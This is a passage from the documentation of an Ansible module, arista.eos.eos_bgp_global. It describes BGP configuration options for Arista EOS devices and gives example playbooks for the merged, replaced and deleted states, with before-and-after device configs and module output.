next hop
type: bool
next_hop_unchanged:
description: Preserve original nexthop while advertising routes to
eBGP peers.
type: bool
next_hop_v6_address:
description: IPv6 next-hop address for the neighbor
type: str
out_delay:
description: Delay outbound route updates.
type: int
encryption_password:
description: Password to use in computation of MD5 hash.
type: dict
suboptions:
type:
description: Encryption type.
type: int
choices: [0, 7]
password:
description: password (up to 80 chars).
type: str
remote_as:
description: Neighbor Autonomous System.
type: str
remove_private_as:
description: Remove private AS number from updates to this peer.
type: dict
suboptions:
set:
description: If True, set remove_private_as.
type: bool
all:
description: Remove private AS number.
type: bool
replace_as:
description: Replace private AS number with local AS number.
type: bool
peer_group:
description: Name of the peer-group.
type: str
prefix_list:
description: Prefix list reference.
type: dict
suboptions:
direction:
description: Configure an inbound/outbound prefix-list.
type: str
choices: ['in', 'out']
name:
description: prefix list name.
type: str
route_map:
description: Route map reference.
type: dict
suboptions:
direction:
description: Configure an inbound/outbound route-map.
type: str
choices: ['in', 'out']
name:
description: Route map name.
type: str
route_reflector_client:
description: Configure peer as a route reflector client.
type: bool
route_to_peer:
description: Use routing table information to reach the peer.
type: bool
send_community:
description: Send community attribute to this neighbor.
type: dict
suboptions:
community_attribute:
description: Type of community attributes to send to this neighbor.
type: str
sub_attribute:
description: Attribute to be sent to the neighbor.
type: str
choices: ['extended', 'link-bandwidth', 'standard']
link_bandwidth_attribute:
description: cumulative/aggregate attribute to be sent.
type: str
choices: ['aggregate', 'divide']
speed:
description: Reference link speed in bits/second
type: str
divide:
description: link-bandwidth divide attribute.
type: str
choices: ['equal', 'ratio']
shut_down:
description: Administratively shut down this neighbor.
type: bool
soft_recognition:
description: Configure how to handle routes that fail import.
type: str
choices: ['all', 'None']
timers:
description: Timers.
type: dict
suboptions:
keepalive:
description: Keep Alive Interval in secs.
type: int
holdtime:
description: Hold time in secs.
type: int
transport:
description: Configure transport options for TCP session.
type: dict
suboptions:
connection_mode:
description: Configure connection-mode for TCP session.
type: str
remote_port:
description: Configure BGP peer TCP port to connect to.
type: int
ttl:
description: BGP ttl security check
type: int
update_source:
description: Specify the local source interface for peer BGP
sessions.
type: str
weight:
description: Weight to assign.
type: int
network:
description: Configure routing for a network.
type: list
elements: dict
suboptions:
address:
description: address prefix.
type: str
route_map:
description: Name of route map.
type: str
redistribute:
description: Redistribute routes in to BGP.
type: list
elements: dict
suboptions:
protocol:
description: Routes to be redistributed.
type: str
choices: ['isis', 'ospf3', 'ospf', 'attached-host', 'connected', 'rip', 'static']
route_map:
description: Route map reference.
type: str
isis_level:
description: Applicable for isis routes. Specify isis route level.
type: str
choices: ['level-1', 'level-2', 'level-1-2']
ospf_route:
description: ospf route options.
type: str
choices: ['internal', 'external', 'nssa_external_1', 'nssa_external_2']
router_id:
description: Router id.
type: str
route_target:
description: Route target.
type: dict
suboptions:
action:
description: Route action.
type: str
choices: ['both', 'import', 'export']
target:
description: Route Target.
type: str
shutdown:
description: When True, shut down BGP.
type: bool
timers:
description: Timers.
type: dict
suboptions:
keepalive:
description: Keep Alive Interval in secs.
type: int
holdtime:
description: Hold time in secs.
type: int
ucmp:
description: Configure unequal cost multipathing.
type: dict
suboptions:
fec:
description: Configure UCMP fec utilization threshold.
type: dict
suboptions:
trigger:
description: UCMP fec utilization too high threshold.
type: int
clear:
description: UCMP FEC utilization Clear thresholds.
type: int
link_bandwidth:
description: Configure link-bandwidth propagation delay.
type: dict
suboptions:
mode:
description: UCMP link bandwidth mode
type: str
choices: ['encoding_weighted', 'recursive']
update_delay:
description: Link Bandwidth Advertisement delay.
type: int
mode:
description: UCMP mode.
type: dict
suboptions:
set:
description: If True, ucmp mode is set to 1.
type: bool
nexthops:
description: Value for total number UCMP nexthops.
type: int
update:
description: Configure BGP update generation.
type: dict
suboptions:
wait_for:
description: wait for options before converge or synchronize.
type: str
choices: ['wait_for_convergence', 'wait_install']
batch_size:
description: batch size for FIB route acknowledgements.
type: int
vlan:
description: Configure MAC VRF BGP for single VLAN support.
type: int
vlan_aware_bundle:
description: Configure MAC VRF BGP for multiple VLAN support.
type: str
vrfs:
description: Configure BGP in a VRF.
type: list
elements: dict
suboptions:
vrf:
description: VRF name.
type: str
aggregate_address:
description: Configure aggregate address.
type: list
elements: dict
suboptions:
address:
description: ipv4/ipv6 address prefix.
type: str
advertise_only:
description: Advertise without installing the generated blackhole route in
FIB.
type: bool
as_set:
description: Generate autonomous system set path information.
type: bool
attribute_map:
description: Name of the route map used to set the attribute of the
aggregate route.
type: str
match_map:
description: Name of the route map used to filter the contributors of the
aggregate route.
type: str
summary_only:
description: Filters all more-specific routes from updates.
type: bool
bgp_params:
description: BGP parameters.
type: dict
suboptions:
additional_paths:
description: BGP additional-paths commands
type: str
choices: ['install', 'send', 'receive']
advertise_inactive:
description: Advertise BGP routes even if they are inactive in RIB.
type: bool
allowas_in:
description: Allow local-as in updates.
type: dict
suboptions:
set:
description: When True, it is set.
type: bool
count:
description: Number of local ASNs allowed in a BGP update.
type: int
always_compare_med:
description: BGP Always Compare MED
type: bool
asn:
description: AS Number notation.
type: str
choices: ['asdot', 'asplain']
auto_local_addr:
description: Automatically determine the local address to be used
for the non-transport AF.
type: bool
bestpath:
description: Select the bestpath selection algorithim for BGP routes.
type: dict
suboptions:
as_path:
description: Select the bestpath selection based on as-path.
type: str
choices: ['ignore', 'multipath_relax']
ecmp_fast:
description: Tie-break BGP paths in a ECMP group based on the order of arrival.
type: bool
med:
description: MED attribute
type: dict
suboptions:
confed:
description: MED Confed.
type: bool
missing_as_worst:
description: MED missing-as-worst.
type: bool
skip:
description: skip one of the tie breaking rules in the bestpath selection.
type: bool
tie_break:
description: Configure the tie-break option for BGP bestpath selection.
choices: ['cluster_list_length', 'router_id']
type: str
client_to_client:
description: client to client configuration.
type: bool
cluster_id:
description: Cluster ID of this router acting as a route reflector.
type: str
confederation:
description: confederation.
type: dict
suboptions:
identifier:
description: Confederation identifier.
type: str
peers:
description: Confederation peers.
type: str
control_plane_filter:
description: Control plane filter for BGP.
type: bool
convergence:
description: Bgp convergence parameters.
type: dict
suboptions:
slow_peer:
description: Maximum amount of time to wait for slow peers to estabilsh session.
type: bool
time:
description: time in secs
type: int
default:
description: Default neighbor configuration commands.
type: str
choices: ['ipv4_unicast', 'ipv6_unicast']
enforce_first_as:
description: Enforce the First AS for EBGP routes(default).
type: bool
host_routes:
description: BGP host routes configuration.
type: bool
labeled_unicast:
description: Labeled Unicast.
type: str
choices: ['ip', 'tunnel']
listen:
description: BGP listen.
type: dict
suboptions:
limit:
description: Set limit on the number of dynamic BGP peers allowed.
type: int
range:
description: Subnet Range to be associated with the peer-group.
type: dict
suboptions:
address:
description: Address prefix
type: str
peer_group:
description: Name of peer group.
type: dict
suboptions:
name:
description: name.
type: str
peer_filter:
description: Name of peer filter.
type: str
remote_as:
description: Neighbor AS number
type: str
log_neighbor_changes:
description: Log neighbor up/down events.
type: bool
missing_policy:
description: Missing policy override configuration commands.
type: dict
suboptions:
direction:
description: Missing policy direction options.
type: str
choices: ['in', 'out']
action:
description: Missing policy action options.
type: str
choices: ['deny', 'permit', 'deny-in-out']
monitoring:
description: Enable Bgp monitoring for all/specified stations.
type: bool
next_hop_unchanged:
description: Preserve original nexthop while advertising routes to
eBGP peers.
type: bool
redistribute_internal:
description: Redistribute internal BGP routes.
type: bool
route:
description: Configure route-map for route installation.
type: str
route_reflector:
description: Configure route reflector options
type: dict
suboptions:
set:
description: When True route_reflector is set.
type: bool
preserve:
description: preserve route attributes, overwriting route-map changes
type: bool
transport:
description: Configure transport port for TCP session
type: int
default_metric:
description: Default metric.
type: int
distance:
description: Define an administrative distance.
type: dict
suboptions:
external:
description: distance for external routes.
type: int
internal:
description: distance for internal routes.
type: int
local:
description: distance for local routes.
type: int
graceful_restart:
description: Enable graceful restart mode.
type: dict
suboptions:
set:
description: When True, graceful restart is set.
type: bool
restart_time:
description: Set the max time needed to restart and come back up.
type: int
stalepath_time:
description: Set the max time to hold onto restarting peer stale paths.
type: int
graceful_restart_helper:
description: Enable graceful restart helper mode.
type: bool
access_group:
description: ip/ipv6 access list configuration.
type: dict
suboptions:
afi:
description: Specify ip/ipv6.
type: str
choices: ['ip', 'ipv6']
acl_name:
description: access list name.
type: str
direction:
description: direction of packets.
type: str
maximum_paths:
description: Maximum number of equal cost paths.
type: dict
suboptions:
max_equal_cost_paths:
description: Value for maximum number of equal cost paths.
type: int
max_installed_ecmp_paths:
description: Value for maximum number of installed ECMP routes.
type: int
neighbor:
description: Configure routing for a network.
type: list
elements: dict
suboptions:
peer:
type: str
description: Neighbor address or peer group.
additional_paths:
description: BGP additional-paths commands.
type: str
choices: ['send', 'receive']
allowas_in:
description: Allow local-as in updates.
type: dict
suboptions:
set:
description: When True, it is set.
type: bool
count:
description: Number of local ASNs allowed in a BGP update.
type: int
auto_local_addr:
description: Automatically determine the local address to be used
for the non-transport AF.
type: bool
default_originate:
description: Originate default route to this neighbor.
type: dict
suboptions:
route_map:
description: Route map reference.
type: str
always:
description: Always originate default route to this neighbor.
type: bool
description:
description: Text describing the neighbor.
type: str
dont_capability_negotiate:
description: Donot perform Capability Negotiation with this
neighbor.
type: bool
ebgp_multihop:
description: Allow BGP connections to indirectly connected
external peers.
type: dict
suboptions:
ttl:
description: Time-to-live in the range 1-255 hops.
type: int
set:
description: If True, ttl is not set.
type: bool
enforce_first_as:
description: Enforce the First AS for EBGP routes(default).
type: bool
export_localpref:
description: Override localpref when exporting to an internal
peer.
type: int
fall_over:
description: Configure BFD protocol options for this peer.
type: bool
graceful_restart:
description: Enable graceful restart mode.
type: bool
graceful_restart_helper:
description: Enable graceful restart helper mode.
type: bool
idle_restart_timer:
description: Neighbor idle restart timer.
type: int
import_localpref:
description: Override localpref when importing from an external
peer.
type: int
link_bandwidth:
description: Enable link bandwidth community for routes to this
peer.
type: dict
suboptions:
set:
description: If True, set link bandwidth
type: bool
auto:
description: Enable link bandwidth auto generation for routes from this peer.
type: bool
default:
description: Enable link bandwidth default generation for routes from this
peer.
type: str
update_delay:
description: Delay outbound route updates.
type: int
local_as:
description: Configure local AS number advertised to peer.
type: dict
suboptions:
as_number:
description: AS number.
type: str
fallback:
description: Prefer router AS Number over local AS Number.
type: bool
local_v6_addr:
description: The local IPv6 address of the neighbor in A:B:C:D:E:F:G:H format.
type: str
maximum_accepted_routes:
description: Maximum number of routes accepted from this peer.
type: dict
suboptions:
count:
description: Maximum number of accepted routes (0 means unlimited).
type: int
warning_limit:
description: Maximum number of accepted routes after which a warning is issued.
(0 means never warn)
type: int
maximum_received_routes:
description: Maximum number of routes received from this peer.
type: dict
suboptions:
count:
description: Maximum number of routes (0 means unlimited).
type: int
warning_limit:
description: Percentage of maximum-routes at which warning is to be issued.
type: dict
suboptions:
limit_count:
description: Number of routes at which to warn.
type: int
limit_percent:
description: Percentage of maximum number of routes at which to warn( 1-100).
type: int
warning_only:
description: Only warn, no restart, if max route limit exceeded.
type: bool
metric_out:
description: MED value to advertise to peer.
type: int
monitoring:
description: Enable BGP Monitoring Protocol for this peer.
type: bool
next_hop_self:
description: Always advertise this router address as the BGP
next hop
type: bool
next_hop_unchanged:
description: Preserve original nexthop while advertising routes to
eBGP peers.
type: bool
next_hop_v6_address:
description: IPv6 next-hop address for the neighbor
type: str
out_delay:
description: Delay outbound route updates.
type: int
encryption_password:
description: Password to use in computation of MD5 hash.
type: dict
suboptions:
type:
description: Encryption type.
type: int
choices: [0, 7]
password:
description: password (up to 80 chars).
type: str
remote_as:
description: Neighbor Autonomous System.
type: str
remove_private_as:
description: Remove private AS number from updates to this peer.
type: dict
suboptions:
set:
description: If True, set remove_private_as.
type: bool
all:
description: Remove private AS number.
type: bool
replace_as:
description: Replace private AS number with local AS number.
type: bool
peer_group:
description: Name of the peer-group.
type: str
prefix_list:
description: Prefix list reference.
type: dict
suboptions:
direction:
description: Configure an inbound/outbound prefix-list.
type: str
choices: ['in', 'out']
name:
description: prefix list name.
type: str
route_map:
description: Route map reference.
type: dict
suboptions:
direction:
description: Configure an inbound/outbound route-map.
type: str
choices: ['in', 'out']
name:
description: Route map name.
type: str
route_reflector_client:
description: Configure peer as a route reflector client.
type: bool
route_to_peer:
description: Use routing table information to reach the peer.
type: bool
send_community:
description: Send community attribute to this neighbor.
type: dict
suboptions:
community_attribute:
description: Type of community attributes to send to this neighbor.
type: str
sub_attribute:
description: Attribute to be sent to the neighbor.
type: str
choices: ['extended', 'link-bandwidth', 'standard']
link_bandwidth_attribute:
description: cumulative/aggregate attribute to be sent.
type: str
choices: ['aggregate', 'divide']
speed:
description: Reference link speed in bits/second
type: str
divide:
description: link-bandwidth divide attribute.
type: str
choices: ['equal', 'ratio']
shut_down:
description: Administratively shut down this neighbor.
type: bool
soft_recognition:
description: Configure how to handle routes that fail import.
type: str
choices: ['all', 'None']
timers:
description: Timers.
type: dict
suboptions:
keepalive:
description: Keep Alive Interval in secs.
type: int
holdtime:
description: Hold time in secs.
type: int
transport:
description: Configure transport options for TCP session.
type: dict
suboptions:
connection_mode:
description: Configure connection-mode for TCP session.
type: str
remote_port:
description: Configure BGP peer TCP port to connect to.
type: int
ttl:
description: BGP ttl security check
type: int
update_source:
description: Specify the local source interface for peer BGP
sessions.
type: str
weight:
description: Weight to assign.
type: int
network:
description: Configure routing for a network.
type: list
elements: dict
suboptions:
address:
description: address prefix.
type: str
route_map:
description: Name of route map.
type: str
redistribute:
description: Redistribute routes in to BGP.
type: list
elements: dict
suboptions:
protocol:
description: Routes to be redistributed.
type: str
choices: ['isis', 'ospf3', 'ospf', 'attached-host', 'connected', 'rip', 'static']
route_map:
description: Route map reference.
type: str
isis_level:
description: Applicable for isis routes. Specify isis route level.
type: str
choices: ['level-1', 'level-2', 'level-1-2']
ospf_route:
description: ospf route options.
type: str
choices: ['internal', 'external', 'nssa_external_1', 'nssa_external_2']
route_target:
description: Route target.
type: dict
suboptions:
action:
description: Route action.
type: str
choices: ['both', 'import', 'export']
target:
description: Route Target.
type: str
router_id:
description: Router id.
type: str
shutdown:
description: When True, shut down BGP.
type: bool
timers:
description: Timers.
type: dict
suboptions:
keepalive:
description: Keep Alive Interval in secs.
type: int
holdtime:
description: Hold time in secs.
type: int
ucmp:
description: Configure unequal cost multipathing.
type: dict
suboptions:
fec:
description: Configure UCMP fec utilization threshold.
type: dict
suboptions:
trigger:
description: UCMP fec utilization too high threshold.
type: int
clear:
description: UCMP FEC utilization Clear thresholds.
type: int
link_bandwidth:
description: Configure link-bandwidth propagation delay.
type: dict
suboptions:
mode:
description: UCMP link bandwidth mode
type: str
choices: ['encoding_weighted', 'recursive']
update_delay:
description: Link Bandwidth Advertisement delay.
type: int
mode:
description: UCMP mode.
type: dict
suboptions:
set:
description: If True, ucmp mode is set to 1.
type: bool
nexthops:
description: Value for total number UCMP nexthops.
type: int
update:
description: Configure BGP update generation.
type: dict
suboptions:
wait_for:
description: wait for options before converge or synchronize.
type: str
choices: ['wait_for_convergence', 'wait_install']
batch_size:
description: batch size for FIB route acknowledgements.
type: int
running_config:
description:
- This option is used only with state I(parsed).
- The value of this option should be the output received from the EOS device by
executing the command B(show running-config | section bgp).
- The state I(parsed) reads the configuration from C(running_config) option and
transforms it into Ansible structured data as per the resource module's argspec
and the value is then returned in the I(parsed) key within the result.
type: str
state:
description:
- The state the configuration should be left in.
- State I(purged) removes all the BGP configurations from the
target device. Use caution with this state.('no router bgp <x>')
- State I(deleted) only removes BGP attributes that this modules
manages and does not negate the BGP process completely. Thereby, preserving
address-family related configurations under BGP context.
- Running states I(deleted) and I(replaced) will result in an error if there
are address-family configuration lines present under vrf context that is
is to be removed. Please use the M(arista.eos.eos_bgp_address_family)
module for prior cleanup.
- Refer to examples for more details.
type: str
choices: [deleted, merged, purged, replaced, gathered, rendered, parsed]
default: merged
"""
EXAMPLES = """
# Using merged
# Before state
# veos(config)#show running-config | section bgp
# veos(config)#
- name: Merge provided configuration with device configuration
arista.eos.eos_bgp_global:
config:
as_number: "100"
bgp_params:
host_routes: True
convergence:
slow_peer: True
time: 6
additional_paths: "send"
log_neighbor_changes: True
maximum_paths:
max_equal_cost_paths: 55
aggregate_address:
- address: "1.2.1.0/24"
as_set: true
match_map: "match01"
- address: "5.2.1.0/24"
attribute_map: "attrmatch01"
advertise_only: true
redistribute:
- protocol: "static"
route_map: "map_static"
- protocol: "attached-host"
distance:
internal: 50
neighbor:
- peer: "10.1.3.2"
allowas_in:
set: true
default_originate:
always: true
dont_capability_negotiate: true
export_localpref: 4000
maximum_received_routes:
count: 500
warning_limit:
limit_percent: 5
next_hop_unchanged: true
prefix_list:
name: "prefix01"
direction: "out"
- peer: "peer1"
fall_over: true
link_bandwidth:
update_delay: 5
monitoring: True
send_community:
community_attribute: "extended"
sub_attribute: "link-bandwidth"
link_bandwidth_attribute: "aggregate"
speed: "600"
vlan: 5
state: merged
# After State:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# distance bgp 50 50 50
# maximum-paths 55
# bgp additional-paths send any
# neighbor peer1 peer-group
# neighbor peer1 link-bandwidth update-delay 5
# neighbor peer1 fall-over bfd
# neighbor peer1 monitoring
# neighbor peer1 send-community extended link-bandwidth aggregate 600
# neighbor peer1 maximum-routes 12000
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# vlan 5
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# veos(config)#
#
# Module Execution:
#
# "after": {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "fall_over": true,
# "link_bandwidth": {
# "set": true,
# "update_delay": 5
# },
# "maximum_received_routes": {
# "count": 12000
# },
# "monitoring": true,
# "peer": "peer1",
# "peer_group": "peer1",
# "send_community": {
# "community_attribute": "extended",
# "link_bandwidth_attribute": "aggregate",
# "speed": "600",
# "sub_attribute": "link-bandwidth"
# }
# },
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "export_localpref": 4000,
# "maximum_received_routes": {
# "count": 500,
# "warning_limit": {
# "limit_percent": 5
# }
# },
# "next_hop_unchanged": true,
# "peer": "10.1.3.2"
# }
# ],
# "redistribute": [
# {
# "protocol": "static",
# "route_map": "map_static"
# },
# {
# "protocol": "attached-host"
# }
# ],
# "vlan": 5
# },
# "before": {},
# "changed": true,
# "commands": [
# "router bgp 100",
# "neighbor 10.1.3.2 allowas-in",
# "neighbor 10.1.3.2 default-originate always",
# "neighbor 10.1.3.2 dont-capability-negotiate",
# "neighbor 10.1.3.2 export-localpref 4000",
# "neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent",
# "neighbor 10.1.3.2 next-hop-unchanged",
# "neighbor 10.1.3.2 prefix-list prefix01 out",
# "neighbor peer1 fall-over bfd",
# "neighbor peer1 link-bandwidth update-delay 5",
# "neighbor peer1 monitoring",
# "neighbor peer1 send-community extended link-bandwidth aggregate 600",
# "redistribute static route-map map_static",
# "redistribute attached-host",
# "aggregate-address 1.2.1.0/24 as-set match-map match01",
# "aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only",
# "bgp host-routes fib direct-install",
# "bgp convergence slow-peer time 6",
# "bgp additional-paths send any",
# "bgp log-neighbor-changes",
# "maximum-paths 55",
# "distance bgp 50",
# "vlan 5"
# ],
# Using replaced:
# Before state:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# distance bgp 50 50 50
# maximum-paths 55
# bgp additional-paths send any
# neighbor peer1 peer-group
# neighbor peer1 link-bandwidth update-delay 5
# neighbor peer1 fall-over bfd
# neighbor peer1 monitoring
# neighbor peer1 send-community extended link-bandwidth aggregate 600
# neighbor peer1 maximum-routes 12000
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# vlan 5
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# !
# vrf vrf01
# route-target import 54:11
# neighbor 192.168.3.11 dont-capability-negotiate
# neighbor 192.168.3.11 allowas-in 3
# neighbor 192.168.3.11 default-originate always
# neighbor 192.168.3.11 maximum-routes 12000
# veos(config)#
- name: replace provided configuration with device configuration
arista.eos.eos_bgp_global:
config:
as_number: "100"
bgp_params:
host_routes: True
convergence:
slow_peer: True
time: 6
additional_paths: "send"
log_neighbor_changes: True
vrfs:
- vrf: "vrf01"
maximum_paths:
max_equal_cost_paths: 55
aggregate_address:
- address: "1.2.1.0/24"
as_set: true
match_map: "match01"
- address: "5.2.1.0/24"
attribute_map: "attrmatch01"
advertise_only: true
redistribute:
- protocol: "static"
route_map: "map_static"
- protocol: "attached-host"
distance:
internal: 50
neighbor:
- peer: "10.1.3.2"
allowas_in:
set: true
default_originate:
always: true
dont_capability_negotiate: true
export_localpref: 4000
maximum_received_routes:
count: 500
warning_limit:
limit_percent: 5
next_hop_unchanged: true
prefix_list:
name: "prefix01"
direction: "out"
- peer: "peer1"
fall_over: true
link_bandwidth:
update_delay: 5
monitoring: True
send_community:
community_attribute: "extended"
sub_attribute: "link-bandwidth"
link_bandwidth_attribute: "aggregate"
speed: "600"
state: replaced
# After State:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# bgp additional-paths send any
# !
# vrf vrf01
# distance bgp 50 50 50
# maximum-paths 55
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# veos(config)#
#
#
# Module Execution:
#
# "after": {
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "vrfs": [
# {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "export_localpref": 4000,
# "maximum_received_routes": {
# "count": 500,
# "warning_limit": {
# "limit_percent": 5
# }
# },
# "next_hop_unchanged": true,
# "peer": "10.1.3.2"
# }
# ],
# "redistribute": [
# {
# "protocol": "static",
# "route_map": "map_static"
# },
# {
# "protocol": "attached-host"
# }
# ],
# "vrf": "vrf01"
# }
# ]
# },
# "before": {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "fall_over": true,
# "link_bandwidth": {
# "set": true,
# "update_delay": 5
# },
# "maximum_received_routes": {
# "count": 12000
# },
# "monitoring": true,
# "peer": "peer1",
# "peer_group": "peer1",
# "send_community": {
# "community_attribute": "extended",
# "link_bandwidth_attribute": "aggregate",
# "speed": "600",
# "sub_attribute": "link-bandwidth"
# }
# },
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "export_localpref": 4000,
# "maximum_received_routes": {
# "count": 500,
# "warning_limit": {
# "limit_percent": 5
# }
# },
# "next_hop_unchanged": true,
# "peer": "10.1.3.2"
# }
# ],
# "redistribute": [
# {
# "protocol": "static",
# "route_map": "map_static"
# },
# {
# "protocol": "attached-host"
# }
# ],
# "vlan": 5,
# "vrfs": [
# {
# "neighbor": [
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "maximum_received_routes": {
# "count": 12000
# },
# "peer": "192.168.3.11"
# }
# ],
# "route_target": {
# "action": "import",
# "target": "54:11"
# },
# "vrf": "vrf01"
# }
# ]
# },
# "changed": true,
# "commands": [
# "router bgp 100",
# "vrf vrf01",
# "no route-target import 54:11",
# "neighbor 10.1.3.2 allowas-in",
# "neighbor 10.1.3.2 default-originate always",
# "neighbor 10.1.3.2 dont-capability-negotiate",
# "neighbor 10.1.3.2 export-localpref 4000",
# "neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent",
# "neighbor 10.1.3.2 next-hop-unchanged",
# "neighbor 10.1.3.2 prefix-list prefix01 out",
# "neighbor peer1 fall-over bfd",
# "neighbor peer1 link-bandwidth update-delay 5",
# "neighbor peer1 monitoring",
# "neighbor peer1 send-community extended link-bandwidth aggregate 600",
# "no neighbor 192.168.3.11",
# "redistribute static route-map map_static",
# "redistribute attached-host",
# "aggregate-address 1.2.1.0/24 as-set match-map match01",
# "aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only",
# "maximum-paths 55",
# "distance bgp 50",
# "exit",
# "no neighbor peer1 peer-group",
# "no neighbor peer1 link-bandwidth update-delay 5",
# "no neighbor peer1 fall-over bfd",
# "no neighbor peer1 monitoring",
# "no neighbor peer1 send-community extended link-bandwidth aggregate 600",
# "no neighbor peer1 maximum-routes 12000",
# "no neighbor 10.1.3.2",
# "no redistribute static route-map map_static",
# "no redistribute attached-host",
# "no aggregate-address 1.2.1.0/24 as-set match-map match01",
# "no aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only",
# "bgp host-routes fib direct-install",
# "bgp log-neighbor-changes",
# "no distance bgp 50 50 50",
# "no maximum-paths 55",
# "no vlan 5"
# ],
#
# Using replaced (in presence of address_family under vrf):
# Before State:
#veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# bgp additional-paths send any
# !
# vrf vrf01
# distance bgp 50 50 50
# maximum-paths 55
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# !
# address-family ipv6
# redistribute dhcp
# veos(config)#
- name: Replace
arista.eos.eos_bgp_global:
config:
as_number: "100"
graceful_restart:
set: True
router_id: "1.1.1.1"
timers:
keepalive: 2
holdtime: 5
ucmp:
mode:
set: True
vlan_aware_bundle: "bundle1 bundle2 bundle3"
state: replaced
# Module Execution:
# fatal: [192.168.122.113]: FAILED! => {
# "changed": false,
# "invocation": {
# "module_args": {
# "config": {
# "access_group": null,
# "aggregate_address": null,
# "as_number": "100",
# "bgp_params": null,
# "default_metric": null,
# "distance": null,
# "graceful_restart": {
# "restart_time": null,
# "set": true,
# "stalepath_time": null
# },
# "graceful_restart_helper": null,
# "maximum_paths": null,
# "monitoring": null,
# "neighbor": null,
# "network": null,
# "redistribute": null,
# "route_target": null,
# "router_id": "1.1.1.1",
# "shutdown": null,
# "timers": {
# "holdtime": 5,
# "keepalive": 2
# },
# "ucmp": {
# "fec": null,
# "link_bandwidth": null,
# "mode": {
# "nexthops": null,
# "set": true
# }
# },
# "update": null,
# "vlan": null,
# "vlan_aware_bundle": "bundle1 bundle2 bundle3",
# "vrfs": null
# },
# "running_config": null,
# "state": "replaced"
# }
# },
# "msg": "Use the _bgp_af module to delete the address_family under vrf, before replacing/deleting the vrf."
# }
# Using deleted:
# Before state:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# bgp additional-paths send any
# !
# vrf vrf01
# distance bgp 50 50 50
# maximum-paths 55
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
